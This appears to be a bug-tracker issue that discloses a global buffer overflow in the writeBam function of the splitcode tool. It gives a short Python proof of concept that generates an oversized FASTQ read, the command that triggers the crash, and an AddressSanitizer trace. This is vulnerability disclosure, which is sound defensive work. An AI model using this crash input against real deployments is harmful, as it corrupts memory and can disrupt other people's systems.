Global Buffer Overflow in writeBam #53
Description
There is a buffer overflow vulnerability in src/ProcessReads.cpp within the MasterProcessor::writeBam function.
The function declares a fixed-size static buffer buf1 of 32,768 bytes to construct the BAM record. It performs memcpy and direct array indexing to write the Read Name, Sequence, and Quality data into this buffer without verifying if the data fits.
If the input FASTQ file contains a read with a sequence length exceeding approximately 21,800 base pairs, the calculated write offsets exceed the 32KB limit, causing a write out-of-bounds. This results in memory corruption in the global data section.
PoC
filename = "payload.fastq"
read_len = 35000
header = "@LongRead"
seq = "A" * read_len
sep = "+"
qual = "I" * read_len
with open(filename, "w") as f:
f.write(f"{header}\n{seq}\n{sep}\n{qual}\n")
print(f"Generated {filename} with read length {read_len}")python3 gen_poc.py
./splitcode --out-bam --trim-only -o out.bam payload.fastq
ASan report:
==5161==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0001022f28e3 ...
WRITE of size 16 at 0x0001022f28e3 thread T1
#0 0x00010222a1dc in MasterProcessor::writeBam(...) ProcessReads.cpp:887
#1 0x00010221a84c in MasterProcessor::writeOutput(...) ProcessReads.cpp:750
...
0x0001022f28e3 is located 3 bytes after global variable 'MasterProcessor::writeBam(...)::buf1' defined in '/.../src/ProcessReads.cpp' (0x0001022ea8e0) of size 32768